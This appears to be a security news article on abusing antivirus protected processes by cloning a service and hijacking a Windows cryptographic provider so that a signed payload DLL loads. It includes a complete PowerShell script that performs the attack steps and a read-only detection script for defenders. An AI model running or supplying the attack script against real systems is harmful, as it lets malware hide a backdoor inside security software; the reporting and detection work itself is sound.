
A newly described technique lets attackers abuse antivirus products by running their own code inside the antivirus's own processes. Because those processes are trusted and actively shielded by the product, the injected code inherits that trust and evades the very detection the antivirus is meant to provide.

The technique, described by security researcher Two Seven One Three on X (@TwoSevenOneT), clones a protected service and hijacks a cryptographic provider so that an attacker-controlled DLL is loaded into the resulting protected process. From there the attacker can drop a backdoor into the antivirus installation directory, a location the product's tamper protection normally keeps out of reach.

The method highlights a weakness in how antivirus products prioritize their own survivability. By getting code into these "immortal" processes, the researcher inherits their privileges and self-protection exemptions and can perform actions such as writing files to locked-down folders, all without triggering detection.

As antivirus products evolve to counter more sophisticated threats, techniques like this show how hard it is to harden a product against tampering without turning the hardened components themselves into an attack surface.

Evading Antivirus Protections

Antivirus software uses several mechanisms to shield its core processes from tampering so that protection stays active.

These processes generally run with SYSTEM privileges, which gives them broad access to monitor and neutralize threats anywhere on the host.


Process introspection lets the antivirus inspect its own threads for anomalies, such as code injected from another process.

Further measures include code-integrity checks that verify the legitimacy of loaded modules, and use of Windows' Protected Process Light (PPL) feature, which isolates the user-mode process so that even administrators cannot open it with rights sufficient to tamper with it. At the kernel level, the vendor's driver uses callbacks to block tampering with its components and detection logic, while self-defense routines restart affected components or raise an alert on suspicious behavior.

Deciding which processes qualify for this protection is handled just as carefully. Developers avoid simple checks such as the process name, which an attacker could satisfy by copying the filename.

Instead, products such as Bitdefender combine a check of the process's ImagePath, requiring the executable to reside in the proper installation directory, with restrictions on writes to the installation folders.

Digital signatures on loaded DLLs add another layer, although attackers may try to get around them with more advanced evasion techniques.

Spoofing the Process Environment Block (PEB) or launching the binary through the CreateProcess API usually fails, because the kernel driver observes process creation from the very beginning.

Service Duplication and Injection Techniques

The ingenuity of this technique lies in leveraging the antivirus's dependence on operating system facilities while targeting its less-protected auxiliary components.

Modern antivirus suites bundle extra features such as firewalls, VPN clients, and user interfaces, each running as a protected process that is allowed to write to the installation folder. Since these processes cannot be terminated or suspended without a kernel exploit or a tool such as EDR-Freeze, the researcher instead clones one of them.

By manually exporting and re-importing the registry key of an antivirus service, such as Bitdefender's BDProtSrv, a duplicate service with identical configuration can be created under a new name.

After a reboot, Services.exe reads the duplicate into its service database, yielding a second protected process. Process Explorer confirms the protection: attempts to terminate the clone fail with "access denied".

Injection is achieved by hijacking the Windows Cryptography API, which the antivirus processes use for encryption and signing. Changing a provider entry under HKLM\SOFTWARE\Microsoft\Cryptography\Defaults\Provider to point at a malicious DLL causes that DLL to be loaded when the service starts.

To pass signature checks, the DLL is signed with a certificate cloned from a legitimate Windows binary, a method described in SpecterOps research.

The procedure is: create the cloned service, modify the provider, trust the cloned signing certificate, start the service, confirm that the DLL ran, and then restore the registry to prevent instability.
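The procedure above, written out as an added PowerShell example for an isolated lab; this is not the article's or IAmAntimalware's own code. BDProtSrv is the service the article names; the clone name, the provider chosen for redirection, and the DLL and certificate paths are placeholders. The "Image Path" value name is the standard registration value for a CSP under the provider key, a Windows convention rather than something the article states.

```powershell
# Added lab example (not IAmAntimalware's code): the article's procedure as registry
# operations. Run elevated on an isolated test machine; it changes machine-wide state.
# Assumed placeholders: clone name, provider, payload DLL and cloned root certificate.
$OriginalService = 'BDProtSrv'                                               # named in the article
$CloneName       = 'BDProtSrvClone'                                          # assumption
$ProviderName    = 'Microsoft Enhanced RSA and AES Cryptographic Provider'   # assumption: provider to redirect
$PayloadDll      = 'C:\Lab\payload.dll'                                      # assumption: DLL signed with the cloned cert
$ClonedRootCer   = 'C:\Lab\cloned-root.cer'                                  # assumption: root of the cloned chain
$ErrorActionPreference = 'Stop'

$svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$cspKey  = "HKLM:\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\$ProviderName"
$state   = Join-Path $env:ProgramData 'csp-clone-state.json'   # rollback data must survive the reboot

function Invoke-Setup {
    # Step 1: clone the service by copying its whole registry key. ImagePath is unchanged,
    # which is exactly what the vendor driver's installation-folder check trusts.
    if (-not (Test-Path "$svcRoot\$CloneName")) {
        Copy-Item -Path "$svcRoot\$OriginalService" -Destination "$svcRoot\$CloneName" -Recurse
    }
    # Step 2: redirect the provider's DLL ("Image Path" is the CSP registration value name).
    $original = (Get-ItemProperty -Path $cspKey).'Image Path'
    Set-ItemProperty -Path $cspKey -Name 'Image Path' -Value $PayloadDll
    # Step 3: trust the cloned chain in the machine root store so the signature verifies.
    $root = Import-Certificate -FilePath $ClonedRootCer -CertStoreLocation 'Cert:\LocalMachine\Root'
    @{ ImagePath = $original; RootThumbprint = $root.Thumbprint } | ConvertTo-Json | Set-Content -Path $state
    'Setup complete. The SCM only reads a registry-imported service at boot: reboot, then run Invoke-Verify.'
}

function Invoke-Verify {
    # Step 4: start the clone (it may already be running if the copied Start value is 2, automatic).
    if ((Get-Service -Name $CloneName).Status -ne 'Running') { Start-Service -Name $CloneName }
    $svcPid = (Get-CimInstance -ClassName Win32_Service -Filter "Name='$CloneName'").ProcessId
    # Step 5a: the Process Explorer "access denied" observation in script form.
    try {
        Stop-Process -Id $svcPid -ErrorAction Stop
        Write-Warning "PID $svcPid terminated: the clone is NOT protected"
    } catch {
        "PID $svcPid is protected: $($_.Exception.Message)"
    }
    # Step 5b: the article's test DLL writes mark.txt beside the service binary.
    $image = (Get-ItemProperty -Path "$svcRoot\$CloneName").ImagePath
    $exe   = if ($image -match '^"([^"]+)"') { $Matches[1] } else { ($image -split '\s+')[0] }
    $mark  = Join-Path (Split-Path -Parent $exe) 'mark.txt'
    "mark.txt present in install folder: $(Test-Path $mark)"
}

function Invoke-Rollback {
    # Step 6: restore the provider first; a dangling Image Path breaks every CryptoAPI
    # consumer on the host, which is the instability the article warns about.
    $saved = Get-Content -Path $state -Raw | ConvertFrom-Json
    Set-ItemProperty -Path $cspKey -Name 'Image Path' -Value $saved.ImagePath
    Remove-Item -Path "Cert:\LocalMachine\Root\$($saved.RootThumbprint)" -ErrorAction SilentlyContinue
    # The running clone cannot be stopped (that is the point); deleting its key takes effect at the next boot.
    Remove-Item -Path "$svcRoot\$CloneName" -Recurse -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $state -ErrorAction SilentlyContinue
}
```

Dot-source the script, run Invoke-Setup, reboot, then Invoke-Verify and finally Invoke-Rollback. The rollback state is written to disk rather than kept in a variable precisely because the reboot between steps 3 and 4 would otherwise lose the original Image Path.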

To automate this, Two Seven One Three released IAmAntimalware, an open-source tool available on GitHub. It clones the service, modifies the cryptographic provider or a COM object registration, imports the certificate, and starts the clone, with command-line options for the original service, the clone name, the certificate file, and the DLL path.

In tests against Bitdefender, the sample DLL was signed with CertClone, another GitHub tool that clones signing certificates. The DLL, which emits debug strings and writes a "mark.txt" file to the installation folder, was successfully loaded into the protected process.

Similar results were obtained against Trend Micro and Avast, although Avast required targeting its GUI process for reliable results. The implications are significant: malware could plant a backdoor inside the antivirus itself and execute undetected.

Defending against this requires close monitoring of module loads from unusual paths, auditing the trusted certificates stored in the registry, and enforcing PPL alongside behavioral analytics. One caveat for defenders: a DLL signed with a cloned certificate cannot meet the signature level the kernel enforces for a genuine PPL process, so the technique succeeds where the "protection" is implemented by the vendor's own driver rather than by PPL's kernel-enforced code integrity.

As offensive research advances, findings like this push antivirus vendors to make sure their own defensive strengths do not turn into vulnerabilities.
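The three checks recommended above, as an added read-only audit script; this is not code from the article or from the IAmAntimalware project. It assumes Windows PowerShell 5.1 or later running elevated, and an optional list of known-good root thumbprints taken from a clean build of the same image, which is the operator's to supply.

```powershell
# Added audit example (not code from the article or from IAmAntimalware): a read-only
# sweep for the indicators the article recommends watching. Run elevated in Windows
# PowerShell 5.1 or later. The baseline thumbprint list is assumed to come from a
# known-good build; without it the root-store check only reports duplicate subjects.
param([string[]]$KnownGoodRootThumbprints = @())

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Check, [string]$Item, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Check = $Check; Item = $Item; Detail = $Detail })
}

# 1. Cryptographic providers whose DLL is a full path outside the Windows directory.
#    Built-in providers register a bare file name (e.g. rsaenh.dll) resolved from System32;
#    a path into a product's install folder is the redirection the article describes.
$cspRoot = 'HKLM:\SOFTWARE\Microsoft\Cryptography\Defaults\Provider'
foreach ($key in Get-ChildItem -Path $cspRoot) {
    $image = (Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue).'Image Path'
    if (-not $image) { continue }
    $resolved = [Environment]::ExpandEnvironmentVariables($image)
    if ($resolved -match '[\\/]' -and $resolved -notlike "$env:SystemRoot\*") {
        Add-Finding 'CSP Image Path outside Windows directory' $key.PSChildName $resolved
    }
}

# 2. Service keys that share another service's binary (a clone keeps the original ImagePath),
#    or that exist in the registry but are unknown to the SCM (imported, awaiting a reboot).
$svcRoot  = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$scmKnown = @{}
Get-Service | ForEach-Object { $scmKnown[$_.Name] = $true }
$byBinary = @{}
foreach ($key in Get-ChildItem -Path $svcRoot -ErrorAction SilentlyContinue) {
    $p = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
    if (-not $p -or -not $p.ImagePath -or -not $p.Type) { continue }
    # Keep Win32 services (0x10 own process, 0x20 shared); skip drivers and per-user templates (0x40).
    if (($p.Type -band 0x30) -eq 0 -or ($p.Type -band 0x40) -ne 0) { continue }
    $raw = [Environment]::ExpandEnvironmentVariables($p.ImagePath)
    $exe = if ($raw -match '^\s*"([^"]+)"') { $Matches[1] } else { ($raw -split '\s+')[0] }
    $exe = $exe.ToLowerInvariant()
    if ($exe -like '*\svchost.exe') { continue }   # svchost-hosted services legitimately share one binary
    if (-not $byBinary.ContainsKey($exe)) { $byBinary[$exe] = @() }
    $byBinary[$exe] += $key.PSChildName
    if (-not $scmKnown.ContainsKey($key.PSChildName)) {
        Add-Finding 'Service key not registered with SCM' $key.PSChildName $exe
    }
}
foreach ($entry in $byBinary.GetEnumerator()) {
    if ($entry.Value.Count -gt 1) {
        Add-Finding 'Services sharing one binary' ($entry.Value -join ', ') $entry.Key
    }
}

# 3. Machine root store. A cloned certificate reproduces the original's subject and validity
#    but not its key, so the tell is a second root with the same Subject and a different thumbprint.
$roots = Get-ChildItem -Path 'Cert:\LocalMachine\Root'
foreach ($group in ($roots | Group-Object -Property Subject | Where-Object Count -gt 1)) {
    Add-Finding 'Duplicate root Subject' $group.Name ($group.Group.Thumbprint -join ', ')
}
if ($KnownGoodRootThumbprints.Count -gt 0) {
    foreach ($cert in ($roots | Where-Object { $KnownGoodRootThumbprints -notcontains $_.Thumbprint })) {
        Add-Finding 'Root not in baseline' $cert.Subject $cert.Thumbprint
    }
}

$findings | Format-Table -AutoSize
```

Expect some findings to need triage: third-party smart-card CSPs legitimately register a DLL under Program Files, and vendor suites sometimes run several services from one binary with different arguments. The script covers the cryptographic-provider variant only; IAmAntimalware's COM-object variant needs an equivalent check of the relevant InprocServer32 registrations. For continuous monitoring rather than a one-off sweep, the same indicators map to Sysmon Event ID 7 (image loaded, with its signature fields) and Event ID 13 (registry value set) scoped to the provider keys and the machine root store.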
